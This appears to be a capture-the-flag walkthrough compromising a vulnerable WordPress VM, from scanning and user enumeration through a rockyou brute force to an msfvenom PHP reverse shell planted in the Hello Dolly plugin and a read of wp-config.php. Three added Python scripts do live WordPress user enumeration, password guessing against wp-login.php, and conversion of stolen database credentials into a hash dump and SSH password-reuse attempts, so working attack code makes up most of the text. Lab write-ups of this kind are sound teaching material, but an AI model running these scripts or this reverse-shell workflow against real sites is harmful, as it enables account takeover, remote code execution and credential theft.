You can find the VM and more information here.
Open the .ova file with VMware.
Nmap results
nmap -Pn -sV -sS -sC 192.168.148.229
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-10 10:32 +0530
Nmap scan report for 192.168.148.229
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.148.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:41:F5:CC (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP login: anonymous login is allowed (see nmap's ftp-anon output above); the only entry listed is the public directory.
Nikto results
nikto -host http://192.168.148.229/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.148.229
+ Target Hostname: 192.168.148.229
+ Target Port: 80
+ Start Time: 2018-07-10 09:54:27 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 2140, size: 177, mtime: Sun Mar 4 00:47:59 2018
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ Uncommon header 'link' found, with contents: </backup_wordpress/?rest_route=/>; rel="https://api.w.org/"
+ Entry '/backup_wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8347 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2018-07-10 09:54:40 (GMT5.5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
WPScan - user enumeration
wpscan --url http://192.168.148.229/backup_wordpress/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
<-- snip -->
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Tue Jul 10 10:10:11 2018
[+] Requests Done: 57
[+] Memory used: 64.051 MB
[+] Elapsed time: 00:00:05
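WPScan's --enumerate u finds these two users through the REST API (which nikto showed is reachable via the ?rest_route= link header) and through the ?author=N redirect. The script below is an added example of doing the same by hand; it is not code from the write-up or from WPScan. The parsing functions run offline on constructed sample responses; enumerate_live() takes a target URL and is only an assumption about how the site answers.

```python
#!/usr/bin/env python3
"""WordPress user enumeration via the REST API and ?author=N redirects.
Added example (not from the write-up); parsing runs offline, enumerate_live()
needs a reachable target."""
import json
import re
import urllib.request
from urllib.error import HTTPError, URLError


def users_from_rest(body: str) -> list:
    """Parse the JSON array from wp/v2/users into (id, slug, name) tuples.
    The slug is user_nicename, which equals the login unless it was changed."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):          # e.g. {"code": "rest_user_cannot_view"}
        return []
    return [(u.get("id"), u["slug"], u.get("name", ""))
            for u in data if isinstance(u, dict) and "slug" in u]


AUTHOR_RE = re.compile(r"/author/([^/?#]+)/?")


def user_from_author_redirect(location: str):
    """?author=N answers 301 to /author/<nicename>/ when user N exists."""
    m = AUTHOR_RE.search(location or "")
    return m.group(1) if m else None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Make urllib surface 3xx as HTTPError so Location can be inspected.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def enumerate_live(base_url: str, max_author_id: int = 10) -> dict:
    """Query a live site. Returns {nicename: (channel, id)}."""
    base = base_url.rstrip("/")
    found = {}
    try:
        with urllib.request.urlopen(base + "/?rest_route=/wp/v2/users", timeout=5) as r:
            for uid, slug, _name in users_from_rest(r.read().decode(errors="replace")):
                found[slug] = ("rest", uid)
    except (HTTPError, URLError):
        pass                                # REST disabled or filtered; use author IDs
    opener = urllib.request.build_opener(_NoRedirect)
    for n in range(1, max_author_id + 1):
        try:
            opener.open(base + "/?author=%d" % n, timeout=5)
        except HTTPError as e:              # 301 lands here; 404 means no such id
            slug = user_from_author_redirect(e.headers.get("Location"))
            if slug:
                found.setdefault(slug, ("author-id", n))
        except URLError:
            break
    return found


# Constructed sample responses: ids and logins match the wpscan table above,
# the JSON body and redirect URL themselves are made up for this example.
SAMPLE_REST = '[{"id":1,"slug":"admin","name":"admin"},{"id":2,"slug":"john","name":"john"}]'
SAMPLE_LOCATION = "http://192.168.148.229/backup_wordpress/author/john/"

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for slug, (chan, uid) in sorted(enumerate_live(sys.argv[1]).items()):
            print(f"{uid:>3}  {slug:<16} via {chan}")
    else:
        print(users_from_rest(SAMPLE_REST))
        print(user_from_author_redirect(SAMPLE_LOCATION))
```

Run it with the blog URL as the only argument to hit a live target; with no argument it exercises the parsers on the constructed samples. The author-ID channel still works when the REST users endpoint is blocked, which is why WPScan tries both.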
WPScan password brute force (user john)
wpscan --url http://192.168.148.229/backup_wordpress --wordlist /home/sura/Research-and-Development/password-dump/rockyou.txt --username john
[+] URL: http://192.168.148.229/backup_wordpress/
[+] Started: Tue Jul 10 09:23:42 2018
<-- snip -->
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[!] ERROR: We received an unknown response for login: john and password: enigma
^CBrute Forcing 'john' Time: 00:27:35 < > (11312 / 2902428) 0.38% ETA: ??:??:??
The "unknown response" line is the hit, not a failure. WPScan 2.9.x only recognises the stock wp-login.php replies (a redirect into wp-admin for success, a 200 page containing login_error for failure); anything else is reported as this error, so a reply it did not expect stands out from the thousands of clean failures around it. The run was stopped with ^C at that point and the pair john:enigma tried by hand.
Log in to the site with the credentials found (john / enigma).
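To make the "unknown response" behaviour concrete, here is an added example (not the write-up's or WPScan's code) of a wp-login.php guesser that classifies every reply explicitly into valid, invalid or unknown, and returns the unknown ones for manual verification instead of discarding them. The classification rules are the stock WordPress responses; the three sample replies at the bottom are constructed, not captured from the VM, and try_login() assumes a reachable target.

```python
#!/usr/bin/env python3
"""wp-login.php password guessing with explicit response classification.
Added example, not from the write-up; SAMPLE_* replies are constructed."""
import urllib.parse
import urllib.request
from urllib.error import HTTPError, URLError


def classify_login(status: int, headers: dict, body: str) -> str:
    """Map one wp-login.php response to 'valid', 'invalid' or 'unknown'.

    Stock WordPress: a failed login answers 200 with <div id="login_error">;
    a successful one answers 302 with a wordpress_logged_in_* cookie and a
    Location into wp-admin (or wherever redirect_to pointed)."""
    h = {k.lower(): v for k, v in (headers or {}).items()}
    if status in (301, 302, 303):
        if "wordpress_logged_in" in h.get("set-cookie", "") or "/wp-admin" in h.get("location", ""):
            return "valid"
        return "unknown"        # redirected elsewhere: lockout page, custom redirect
    if status == 200 and "login_error" in body:
        return "invalid"
    return "unknown"            # 403/429/5xx, WAF page, empty body, ...


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Surface 3xx as HTTPError so the raw Location/Set-Cookie can be read.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def _flatten(msg) -> dict:
    # Join repeated headers (several Set-Cookie lines) into one string each.
    return {k: ", ".join(msg.get_all(k)) for k in set(msg.keys())}


def try_login(login_url: str, user: str, password: str) -> str:
    """POST one guess exactly as the login form does and classify the reply."""
    data = urllib.parse.urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": login_url.replace("wp-login.php", "wp-admin/"),
        "testcookie": "1",
    }).encode()
    req = urllib.request.Request(login_url, data=data, headers={
        "Cookie": "wordpress_test_cookie=WP+Cookie+check"})   # required by wp-login.php
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as r:
            return classify_login(r.status, _flatten(r.headers), r.read().decode(errors="replace"))
    except HTTPError as e:                                      # 3xx/4xx/5xx land here
        return classify_login(e.code, _flatten(e.headers), e.read().decode(errors="replace"))
    except URLError as e:
        raise RuntimeError(f"network error: {e}") from e


def guess(login_url: str, user: str, wordlist: list) -> list:
    """Walk the list; return (password, verdict) for every non-failure so a
    human can verify the 'unknown' ones, which is what the write-up had to do."""
    hits = []
    for pw in wordlist:
        verdict = try_login(login_url, user, pw)
        if verdict != "invalid":
            hits.append((pw, verdict))
            if verdict == "valid":
                break
    return hits


# Constructed sample replies (status, headers, body); not captured from the VM.
SAMPLE_FAIL = (200, {"Content-Type": "text/html"},
               '<div id="login_error"><strong>ERROR</strong>: The password you entered is incorrect.</div>')
SAMPLE_OK = (302, {"Location": "http://192.168.148.229/backup_wordpress/wp-admin/",
                   "Set-Cookie": "wordpress_logged_in_0123=john%7Cfakecookie; path=/"}, "")
SAMPLE_ODD = (302, {"Location": "http://192.168.148.229/backup_wordpress/"}, "")

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:                  # login_url user wordlist_file
        words = [w.rstrip("\n") for w in open(sys.argv[3], errors="replace")]
        print(guess(sys.argv[1], sys.argv[2], words))
    else:
        for sample in (SAMPLE_FAIL, SAMPLE_OK, SAMPLE_ODD):
            print(sample[0], classify_login(*sample))
```

Anything that lands in "unknown" is worth a manual login attempt before moving on; a scanner that silently drops such replies can miss a valid password, and one that treats every non-failure as a hit will flag lockout pages. Note that rockyou.txt against a single account, as in the run above, is noisy and slow (27 minutes for 0.38% of the list); with two known usernames a short list of likely passwords per user is the better first pass.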
Generate a payload with msfvenom
msfvenom -p php/reverse_php lhost=192.168.148.1 lport=4445 -f raw -e php/base64
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4021 (iteration=0)
php/base64 chosen with final size 4021
Payload size: 4021 bytes
eval(base64_decode(<... base64-encoded payload snipped ...>));
Paste the payload into the Hello Dolly plugin's hello.php through the plugin editor in wp-admin, click Update File, then activate the plugin. (This only works while DISALLOW_FILE_EDIT is unset in wp-config.php, as it is here.)
PHP reverse shell: have a listener up on 192.168.148.1:4445 (the lhost/lport passed to msfvenom) before activating the plugin, e.g. nc -lvnp 4445. WordPress includes every active plugin file on each request, so the first page load after activation connects back.
Database credentials found in wp-config.php:
cat /var/www/backup_wordpress/wp-config.php
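What to do with wp-config.php once you have it, as an added example that is not part of the write-up: pull the define('DB_*') values and table prefix out of the file, build the mysql command that dumps the WordPress password hashes, and list the credential-reuse pairs worth trying over SSH (port 22 is open on this box). The config text embedded below is constructed with placeholder values; it is not the VM's real wp-config.php.

```python
#!/usr/bin/env python3
"""Parse wp-config.php and derive next steps from the DB credentials.
Added example, not from the write-up; SAMPLE_CONFIG is constructed."""
import re
import shlex

DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(\w+)\1\s*,\s*(['"])(.*?)\3\s*\)\s*;""", re.S)
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*(['"])(.*?)\1\s*;""")
DB_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")


def parse_wp_config(text: str) -> dict:
    """Return every define('KEY', 'value') plus table_prefix as a dict.
    (Values containing their own quote character are not handled.)"""
    cfg = {key: val for _q1, key, _q2, val in DEFINE_RE.findall(text)}
    m = PREFIX_RE.search(text)
    if m:
        cfg["table_prefix"] = m.group(2)
    return cfg


def db_creds(cfg: dict) -> dict:
    """Normalise the DB settings; DB_HOST may carry a :port suffix."""
    missing = [k for k in DB_KEYS if k not in cfg]
    if missing:
        raise ValueError("wp-config.php lacks " + ", ".join(missing))
    host, _, port = cfg["DB_HOST"].partition(":")
    return {"user": cfg["DB_USER"], "password": cfg["DB_PASSWORD"],
            "host": host or "localhost", "port": int(port) if port else 3306,
            "database": cfg["DB_NAME"], "prefix": cfg.get("table_prefix", "wp_")}


def mysql_command(c: dict) -> str:
    """mysql CLI line that dumps user_login/user_pass for offline cracking.
    WordPress stores phpass hashes ($P$...), hashcat mode 400."""
    query = f"SELECT user_login, user_pass FROM {c['prefix']}users;"
    return " ".join(shlex.quote(x) for x in [
        "mysql", "-h", c["host"], "-P", str(c["port"]), "-u", c["user"],
        f"-p{c['password']}", c["database"], "-e", query])


def reuse_candidates(c: dict, local_users: list) -> list:
    """(user, password) pairs to try over SSH: the DB password against the
    DB user and against every other known login (WordPress users, root)."""
    names = [c["user"]] + [u for u in local_users if u != c["user"]]
    return [(u, c["password"]) for u in names]


# Constructed sample; placeholder values, not the target's real config.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'S3cretDbPass!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('AUTH_KEY',         'put your unique phrase here');
$table_prefix  = 'wp_';
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    creds = db_creds(parse_wp_config(text))
    print(mysql_command(creds))
    for user, pw in reuse_candidates(creds, ["john", "root"]):
        print(f"try: ssh {user}@192.168.148.229  (password {pw!r})")
```

Pass the path of the real wp-config.php as the argument once you have a shell on the box. The DB user is often a Linux user as well on hobby installs, and the same password is frequently reused for the WordPress admin and for SSH, which is why the reuse list comes before any further exploitation.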